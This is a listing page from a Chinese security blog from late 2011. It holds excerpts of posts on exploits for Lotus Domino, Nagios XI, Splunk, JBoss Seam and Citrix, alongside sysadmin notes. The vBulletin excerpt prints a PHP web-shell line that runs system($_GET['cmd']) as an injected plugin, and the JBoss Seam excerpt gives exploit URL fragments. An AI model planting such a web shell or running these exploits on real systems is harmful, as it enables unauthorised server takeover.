cnbird's blog

cnbird's blog

web service hacking

http://www.soapui.org/SOAP-and-WSDL/web-service-hacking.html

2011-12-31 10:45:10

阅读数 761

评论数 0

Executing arbitrary code on websphere

/wssamplemtom/demo部署即可获得webshell /snoop www.exploit-db.com/download_pdf/12935/

2011-12-30 14:22:59

阅读数 762

评论数 0

Using CURL to exploit LFI to RCE from command line

http://www.youtube.com/watch?v=kf5kZIKtSO0&feature=player_embedded

2011-12-30 11:08:15

阅读数 1235

评论数 0

IBM Lotus Domino Authentication Bypass

# Exploit Title: IBM Lotus Domino Controller auth. bypass # Date:30/11/2011 # Author: Alexey Sintsov # Software Link: http://www.ibm.com/ # Versi...

2011-12-30 09:44:07

阅读数 1315

评论数 0

Privilege escalation vulnerabilities in Nagios XI installer

================ Privilege escalation vulnerabilities in Nagios XI installer < 2011R1.9 Author: 0a29406d9794e4f9b30b3c5d6702c708 twitter.co...

2011-12-30 09:40:46

阅读数 1330

评论数 0

Citrix XenDesktop, XenServer, Receiver 5.6 SP2 Pass-The-Hash

Tested against: Citrix XenDesktop, XenServer, Receiver 5.6 SP2 (possibly other versions as well) By default, the authentication between the Citrix...

2011-12-30 09:39:08

阅读数 1411

评论数 0

CentOS 安装xfce桌面+vncserver远程管理

现在便宜的VPS很多,有些买到都没用几次,在手上闲着还不如利用起来,虽然用ssh也可以管理,但是用图形可以做更多的事情,比如挂电驴,BT之类的. 首先安装桌面环境,我选择的是xfce,轻量级桌面,小巧实用不占太多内存,输入下面命令安装: yum groupinstall xfce-4.4 装...

2011-12-29 17:47:59

阅读数 1924

评论数 0

Splunk Remote Root Exploit

http://www.exploit-db.com/exploits/18245/ from sec1httplib.requestbuilder import Requestobj from sec1httplib.thread_...

2011-12-21 08:47:51

阅读数 1864

评论数 0

一例千万级pv高性能高并发网站架构

一例千万级pv高性能高并发网站架构  http://blog.liuts.com/post/234/ 受CU管理员的邀请参考“千万级pv高性能高并发网站架构与设计交流探讨帖”主题的交流,发表了一案例与大家分享。       一个支撑千万级PV的网站是非常考验一个架构是否成熟、健壮(本文不涉...

2011-12-20 10:17:25

阅读数 3788

评论数 0

vBulletin 论坛全版本 后台拿shell

在后台,进插件管理.添加插件. Ajax_complete 填入代码:1 if(isset($_GET['cmd'])){echo "cmd"; system($_GET['cmd']);exit;} 1 if(isset($_GET['cmd'])){echo "...

2011-12-20 10:16:49

阅读数 1270

评论数 0

security 相关标准secure coding

http://www.cert.org/secure-coding/scstandards.html http://cwe.mitre.org/top25/index.html

2011-12-20 10:11:16

阅读数 809

评论数 0

Exchange 导出用户数据

首先,需要给管理用户提权,操作在另外一篇文章中有介绍,也可以参见http://technet.microsoft.com/zh-cn/library/bb266964(EXCHG.80).aspx 在 Exchange 2007 SP1 中使用 Exchange 命令行管理程序导出邮箱数...

2011-12-16 14:43:48

阅读数 3762

评论数 0

Monitoring von Cisco ASA und IPS über NAGIOS

Anbei die Konfigurationsschritte um über Nagios Cisco ASA oder IPS Appliances zu überwachen. Es muss Die Datei commands.cfg angepasst werden.Die ent...

2011-12-16 11:05:07

阅读数 1117

评论数 0

jboss seam 远程执行漏洞利用步骤

目标:http://www.ip.com http://ip.com/welcome.seam?pwned=java.lang.UNIXProcess%4011b30c7&cid=73478 http://ip.com/home.seam?actionOutcome=/webcome....

2011-12-15 10:59:01

阅读数 2104

评论数 0

JBoss Seam Framework remote code execution

Here's interesting bug I found in JBoss Seam Framework, which led to remote code execution using JBoss EL expressions. Having any sort of custom expr...

2011-12-15 10:32:07

阅读数 1756

评论数 0

lotus domino寻找用户查看过哪些邮件

Longrun/ZGYH/BJ() 9:29:32 好象要通过日志分析,然后在日志分析中查看邮件的UNID来确定用户看过的邮件,有点复杂…… Longrun/ZGYH/BJ() 9:30:15 而且是本地的loga4.nsf分析,会把PC机转死的……

2011-12-14 09:50:04

阅读数 853

评论数 0

nmap wordress 枚举脚本

http://nmap.org/svn/scripts/http-wordpress-enum.nse

2011-12-12 11:30:09

阅读数 730

评论数 0

Configuration Management under FreeBSD with Cfengine 3.

http://unix-heaven.org/node/50 http://blog.zzamboni.org/editing-sshd-configuration-files-with-cfengin

2011-12-11 21:40:45

阅读数 725

评论数 0

bluecoat 试用下载中心

https://bto.bluecoat.com/

2011-12-06 10:38:33

阅读数 836

评论数 0

citrix中文文档中心

http://support.citrix.com/proddocs/topic/xenapp/nl/zh/cn/xenapp65-w2k8-wrapper.html?locale=cn

2011-12-06 10:27:51

阅读数 1097

评论数 0

提示
确定要删除当前文章?
取消 删除
关闭
关闭